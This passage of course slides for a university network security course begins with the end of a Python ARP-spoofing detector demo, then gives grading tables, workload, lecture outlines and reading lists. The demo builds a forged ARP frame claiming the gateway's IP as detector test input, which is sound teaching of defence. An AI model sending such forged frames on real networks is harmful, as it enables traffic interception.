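        build_arp(ARP_REQUEST, rogue_mac, gw_ip, "00:00:00:00:00:00", victim_ip),   # poisoner claims gateway IP
    ]
    for f in frames:
        watcher.observe(f)
    return watcher.alerts


if __name__ == "__main__":
    for a in demo():
        print("ALERT:", a)
```

Only the third frame raises an alert; the victim's own request teaches the watcher a new binding without complaint, which is the intended behaviour for hosts that were not pre-seeded. On a switched network the sensor has to sit where it can see the forged frames, i.e. on a mirror port or on the protected host itself.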

Page 22

Course grading

3 ECTS total points (max. 45 p.)   4 ECTS total points (max. 60 p.)   5 ECTS total points (max. 70 p.)   GRADE
43                                 58                                 67                                 5
38                                 51                                 61                                 4
33                                 44                                 54                                 3
28                                 37                                 45                                 2
23                                 30                                 35                                 1

Work load:

Ca. 100-120 hours, consisting of some lectures and, as the main task, completing the assignments (xx hours, of course depending on your background skills).

Page 23

About the lectures

The lectures are intended to provide an introduction to the different network security topics and examples

The course focuses on hands-on work with security issues and learning by doing (not learning by listening!!).

Some literature:

• Lots of research papers

  - IEEE Xplore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp

  - ACM, http://portal.acm.org/dl.cfm

  - Google Scholar, http://scholar.google.com/

  - http://site.ebrary.com/lib/jyvaskyla

• Introduction to Network Security

• Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions

• CEH: Certified Ethical Hacker Study Guide

Page 24

L1: Introduction to network security

What is security and what are its goals

Threats to networks and IT systems

Security policies

Risk calculation

Security offenses

Social Engineering

Phishing

Legislation

Page 25

L2: Protecting your networked services (visiting lecture

by Tapio Väärämäki, Exclusive Networks Finland)

CARM – Cyber Attack Remediation and Mitigation

UTM (Unified Threat Management)

NGFW (Next Generation Firewall)

WAF (Web Application Firewall)

Database Security

File Security

Endpoint Security

Page 26

L3: Auditing networking security (visiting lecture by

Matti Kannela)

Information security as a concept

Technical security vs. processes / controls / humans.

Examples and cases ’from the field’.

How to create solid IS fundamentals and standards?

Why do bad things happen and how to prevent them?

Change management explained

Page 27

L4: Monitoring and analysing the network data

Normal network behaviour

Anomaly detection

How to gather data

Pre-processing and analysing the data

Page 28

L5: Security Issues for 4/5G Cellular Networks, IoT

Cellular network security issues (PHY/MAC layers)

Different security threats

User identity

Femtocells

Interoperability

RRC signalling

Other threats

Being an all-IP network makes the system vulnerable to IP attacks, such as DoS over the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.

IoT security issues

Page 29

Some links

https://www.viestintavirasto.fi/kyberturvallisuus.html

http://www.iltasanomat.fi/digitoday/tietoturva/

Vulnerabilities

http://www.securityfocus.com

Advanced Persistent Threat

https://www.secureworks.com/capabilities/threat-intelligence/advanced-threats